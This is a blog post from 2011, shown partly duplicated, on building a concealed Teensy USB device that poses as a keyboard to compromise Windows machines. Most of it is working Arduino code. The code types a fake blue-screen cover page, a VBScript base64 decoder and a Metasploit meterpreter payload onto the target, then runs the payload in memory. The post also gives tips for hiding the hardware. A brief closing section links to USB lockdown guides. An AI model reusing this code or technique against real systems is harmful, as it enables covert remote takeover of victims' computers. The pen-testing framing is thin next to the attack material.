Weaponizing the Teensy Slides
Thursday, September 15, 2011
0
comments
Weaponizing the Teensy.
Monday, September 12, 2011
0
comments
/* In progress this post will be updated a few times. */
Few friends and I have been playing around with the Teensy 2.0
You can buy a Teensy from here: http://www.pjrc.com/teensy/
Their has been a few write ups regarding the Teensy being used as a pen testing tool. This is more or less a collection of other peoples ideas mixed in with a few of my ideas. I’ll show you what you need, How to put it together, How to use it / How it works, and how to stop others from using it on you.
What you need:
Software:
Equipment list:
How to put it together:
Solder the double set 5pins on to the Teensy board. Then solder the Micro SD card reader to it.
I pushed my plastic headers together so it sat right on top of the Teensy’s USB reader. This way down the line it will be easier to conceal it. See pictures below:
Their way:
My way:
The Teensy is designed as soon as it gets power from the host it will start to execute the program. To allow you to control what program runs when you turn it on you can set your Teensy up with switches. Others have used dip switches for this. I am going to be using mini rocker switches.
[pictures]
[diograms]
How it works:
I don’t know how else to explain my code. So I have my active code below. During the code I am going to explain in ~detail what each thing is doing. Do not copy and paste from here. It WONT work. Instead grab it from pastebin which has minimal comments as to save space.
Make sure you have all the software setup. Guide
How to program the teensy. Basic usage guide
Format the microSD card less then 2GB using FAT. No file name on the SDcard can be bigger then 8 characters. This doesn’t include the file extension.
using 8.3 file-names (i.e. 12345678.abc)
The main thing is if you can type it on a Keyboard you can do it with a teensy. Just have to follow the same logic as if you were sitting at the computer.
code:
Below is a very small messy version of it. basically when you run it you give it a base64encoded text file and the name of the executable to output it to. reads in the encoded file into an array. Creates an XMLDOM object and sets it as a base64 and out puts it as bytes to a file. It is really quick and slick.
//VBSScript file start//
Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject("Scripting.FileSystemObject"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
//VBSScript file end//
//begin copy of memoryshellexec in base64 to target//
if (file.open(&root, "mexec.txt", O_READ)) {
Serial.println("Opened mexec.txt");
}
else{
sdErrorMsg("\nfile.open failed"); }
//start copy con to place the base64 encoded text
Keyboard.print("copy con C:\\mexec.txt");
PressAndRelease(KEY_ENTER, 1);
//buffer: set t to signed init, read to end of file then print the char of the signed init t.
int16_t q;
while ((q = file.read()) > 0) Keyboard.print((char)q);
//ctrl-z then press enter to commit copy con changes
Keyboard.set_modifier(MODIFIERKEY_CTRL);
PressAndRelease(KEY_Z, 1);
Keyboard.set_modifier(0);
PressAndRelease(KEY_ENTER, 1);
file.close();
How to STOP IT:
IronGeek has spent a lot of time creating a wonderful document explaining on how to prevent malicious USB devices. Please check out the following links.
http://www.irongeek.com/i.php?page=security/plug-and-prey-malicious-usb-devices
Linux environment: 3.2 Locking down Linux using UDEV
Windows enviroment: http://www.irongeek.com/i.php?page=security/locking-down-windows-vista-and-windows-7-against-malicious-usb-devices
You can buy a Teensy from here: http://www.pjrc.com/teensy/
Their has been a few write ups regarding the Teensy being used as a pen testing tool. This is more or less a collection of other peoples ideas mixed in with a few of my ideas. I’ll show you what you need, How to put it together, How to use it / How it works, and how to stop others from using it on you.
What you need:
Software:
- MSFpayload
- MSFencode
- teensy loader software, Arduino Software, TeensyDuino software.
Equipment list:
- Teensy 2.0
- Media card reader
- Double set 5pins.
- Micro SD card.
- Soldering iron and associated gear.
- USB mini cable to male USB A(host)
- Cocaine nsfw
- Hookers nsfw
- Computer windows/linux
How to put it together:
Solder the double set 5pins on to the Teensy board. Then solder the Micro SD card reader to it.
I pushed my plastic headers together so it sat right on top of the Teensy’s USB reader. This way down the line it will be easier to conceal it. See pictures below:
Their way:
My way:
The Teensy is designed as soon as it gets power from the host it will start to execute the program. To allow you to control what program runs when you turn it on you can set your Teensy up with switches. Others have used dip switches for this. I am going to be using mini rocker switches.
[pictures]
[diograms]
How it works:
I don’t know how else to explain my code. So I have my active code below. During the code I am going to explain in ~detail what each thing is doing. Do not copy and paste from here. It WONT work. Instead grab it from pastebin which has minimal comments as to save space.
Make sure you have all the software setup. Guide
How to program the teensy. Basic usage guide
Format the microSD card less then 2GB using FAT. No file name on the SDcard can be bigger then 8 characters. This doesn’t include the file extension.
using 8.3 file-names (i.e. 12345678.abc)
The main thing is if you can type it on a Keyboard you can do it with a teensy. Just have to follow the same logic as if you were sitting at the computer.
code:
// idea from Social-Engineer Toolkit Tee Attack Vector
//
// Special thanks to: Irongeek
//
// Getting payload from SD card instead off server.
//
// Lot of code was stolen from http://dabermania.blogspot.com/
// current msfpayload: windows/meterpreter/bind_tcp ← This is for testing only. Really should use a reverse_TCP
//
// ** SD card attached to SPI bus as follows: This is the same for all teensy 2.0 the ++ is different.
// ** MOSI - pin 2
// ** MISO - pin 3
// ** CLK - pin 1
// ** CS - pin 0
Global setup.
#include <Sd2Card.h>
#include <SdVolume.h>
#include <SdFile.h>
#include <phukdlib.h> IronGeek Function Lib.
const int chipSelect = 0; //for Teensy 2.0 Setting the SPI bus chipSelect aka CS pin to 0 for microSD card.
const int ledPin = 11; // Teensy 2.0 has LED on 11
Setting up the Variables for the lib’s above.
Sd2Card card;
SdVolume volume;
SdFile root;
SdFile file;
For testing only, After you have working code should be deleted. This just outputs error messages tot he serial console in the arduinoSoftware.
// serial output steam
ArduinoOutStream cout(Serial);
// store error strings in flash
#define sdErrorMsg(msg) sdErrorMsg_P(PSTR(msg));
void sdErrorMsg_P(const char* str) {
cout << pgm(str) << endl;
if (card.errorCode()) {
cout << pstr("SD errorCode: ");
cout << hex << int(card.errorCode()) << endl;
cout << pstr("SD errorData: ");
cout << int(card.errorData()) << dec << endl;
}
}
//----------------------------------------------------------------
Void setup() only run one time as the power is applied. This is important as soon as power is applied this starts.
void setup(void){
Serial.begin(9600);
delay(3000); //delay to allow drivers to install. Time is in ms. 3sec works for all OSes expect for windows 7 first install. its roughly 5 - 6 seconds. I believe if you change the Keyboard vendorID to a microsoft one this time can be cut down.
// Initialize SdFat or print a detailed error message and halt
// Use half speed like the native library.
// change to SPI_FULL_SPEED for more performance.
if (!card.init(SPI_HALF_SPEED, chipSelect)){
sdErrorMsg("\ncard.init failed");
return;
}
// initialize a FAT volume
if (!volume.init(&card)){
sdErrorMsg("\nvolume.init failed");
return;
}
// open the root directory
if (!root.openRoot(&volume)){
sdErrorMsg("\nopenRoot failed")
return;
}
// end SD setup.
//Open cmd using phukdlib.h lib
CommandAtRunBarMSWIN("cmd.exe");
//Delay for cmd to open
delay(1000);
//resize cmd window
win_ResizeWindow();
//delete any existing files named decoder.vbs and payload.txt. Fastest, easiest way to insure that you wont have conflicts with existing files.
Keyboard.print(“string”) types the string out like its coming from a keyboard.
Notice the escape char ‘\’
Keyboard.print("del /f c:\\bsod.hta c:\\decode.vbs c:\\payload.txt");
PressAndRelease(key_code, Keycount); This is using IronGeek lib. to save space and time.
PressAndRelease(KEY_ENTER, 1);
// open BSOD to hide all the non-sense.
if (file.open(&root, "bsod.hta", O_READ)) {
Serial.println("Opened bsod.hta");
}
else{
sdErrorMsg("\nfile.open failed");
}
//start copy con to place the BSOFD on disk. Copy con is a great way to create scripts on disk. It creates a file and accepts keystrokes until you hit CTRL+Z and then enter.
Keyboard.print("copy con C:\\bsod.hta");
PressAndRelease(KEY_ENTER, 1);
//buffer: set b to signed init, read to end of file then print the char of the signed init b.
int16_t b; “typedef signed int int16_t”
while ((b = file.read()) > 0) Keyboard.print((char)b); as it reads in the file as long as something can be read greater then 0 it will print that char.
//ctrl-z then press enter to commit copy con changes
Keyboard.set_modifier(MODIFIERKEY_CTRL);
PressAndRelease(KEY_Z, 1);
Keyboard.set_modifier(0);
PressAndRelease(KEY_ENTER, 1);
//close file.
file.close();
//Run the bsod.hta
Keyboard.print("C:\\bsod.hta");
PressAndRelease(KEY_ENTER, 1);
//Move window off screen. More on functions like this below.
win_MoveWindow();
// open a the file containing the Decode VBScript on sdcard.
Long version of the program is located here https://ghads.wordpress.com/2008/10/17/vbscript-readwrite-binary-encodedecode-base64/Below is a very small messy version of it. basically when you run it you give it a base64encoded text file and the name of the executable to output it to. reads in the encoded file into an array. Creates an XMLDOM object and sets it as a base64 and out puts it as bytes to a file. It is really quick and slick.
//VBSScript file start//
Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject("Scripting.FileSystemObject"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
//VBSScript file end//
if (file.open(&root, "decode.txt", O_READ)) {
Serial.println("Opened decode.txt");
}
else{
sdErrorMsg("\nfile.open failed");
}
//use echo to write the vbscript to c:\decoder.vbs
Keyboard.print("echo ");
//buffer: set n to signed init, read decode.txt to end of file then print the char value of the signed init n.
int16_t n;
while ((n = file.read()) > 0) Keyboard.print((char)n);
Keyboard.print(" > C:\\decode.vbs");
PressAndRelease(KEY_ENTER, 1);
//close file
file.close();
//Open and copy payload in base64 format to target.
if (file.open(&root, "payload.txt", O_READ)) {
Serial.println("Opened payload.txt");
}
else{
sdErrorMsg("\nfile.open failed");
}
//start copy con to place the base64 encoded text
Keyboard.print("copy con C:\\payload.txt");
PressAndRelease(KEY_ENTER, 1);
//buffer: set t to signed init, read to end of file then print the char of the signed init t. Same as before just changing the variables so they don’t cross.
int16_t t;
while ((t = file.read()) > 0) Keyboard.print((char)t);
//ctrl-z then press enter to commit copy con changes
Keyboard.set_modifier(MODIFIERKEY_CTRL);
PressAndRelease(KEY_Z, 1);
Keyboard.set_modifier(0);
PressAndRelease(KEY_ENTER, 1);
//close file.
file.close();
//begin copy of memoryshellexec in base64 to target//
if (file.open(&root, "mexec.txt", O_READ)) {
Serial.println("Opened mexec.txt");
}
else{
sdErrorMsg("\nfile.open failed"); }
//start copy con to place the base64 encoded text
Keyboard.print("copy con C:\\mexec.txt");
PressAndRelease(KEY_ENTER, 1);
//buffer: set t to signed init, read to end of file then print the char of the signed init t.
int16_t q;
while ((q = file.read()) > 0) Keyboard.print((char)q);
//ctrl-z then press enter to commit copy con changes
Keyboard.set_modifier(MODIFIERKEY_CTRL);
PressAndRelease(KEY_Z, 1);
Keyboard.set_modifier(0);
PressAndRelease(KEY_ENTER, 1);
file.close();
//run the vbscript to convert the text file to exe
Keyboard.print("cscript C:\\decode.vbs C:\\mexec.txt C:\\mexec.exe"); PressAndRelease(KEY_ENTER, 1);
//run the vbscript to convert the text file to exe
Keyboard.print("cscript C:\\decode.vbs C:\\payload.txt C:\\pwn.exe"); PressAndRelease(KEY_ENTER, 1);
//Run mexec.exe to execute payload directly in memory. //https://github.com/inquisb/shellcodeexec
Keyboard.print("C:\\mexec.exe pwn.exe");
PressAndRelease(KEY_ENTER, 1);
Keyboard.print("cscript C:\\decode.vbs C:\\mexec.txt C:\\mexec.exe"); PressAndRelease(KEY_ENTER, 1);
//run the vbscript to convert the text file to exe
Keyboard.print("cscript C:\\decode.vbs C:\\payload.txt C:\\pwn.exe"); PressAndRelease(KEY_ENTER, 1);
//Run mexec.exe to execute payload directly in memory. //https://github.com/inquisb/shellcodeexec
Keyboard.print("C:\\mexec.exe pwn.exe");
PressAndRelease(KEY_ENTER, 1);
//Turn LED light on for one sec so you know its complete.
pinMode(ledPin, OUTPUT);
digitalWrite(ledPin, HIGH);
delay(1000);
digitalWrite(ledPin, LOW);
}
void loop(void){} As long as the Teensy has power it will loop through the code located in here. Not being used as of right now. When I implemented the switches I will have all the code located in here.
an attempt to move the active window off screen.
void win_MoveWindow(){
int move = 0;
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_SPACE);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.print("m");
while(move < 100) {
delay(5);
Keyboard.set_key1(KEY_UP);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
move++;
}
PressAndRelease(KEY_ENTER, 1);
}
an attempt to resize the active window.
void win_ResizeWindow(){
int move = 0;
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_SPACE);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.print("s");
Keyboard.set_key1(KEY_LEFT);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_key1(KEY_UP);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
while(move < 75) {
delay(5);
Keyboard.set_key1(KEY_RIGHT);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_key1(KEY_DOWN);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
move++;
}
PressAndRelease(KEY_ENTER, 1);
}
How to STOP IT:
IronGeek has spent a lot of time creating a wonderful document explaining on how to prevent malicious USB devices. Please check out the following links.
http://www.irongeek.com/i.php?page=security/plug-and-prey-malicious-usb-devices
Linux environment: 3.2 Locking down Linux using UDEV
Windows enviroment: http://www.irongeek.com/i.php?page=security/locking-down-windows-vista-and-windows-7-against-malicious-usb-devices
Subscribe to:
Posts (Atom)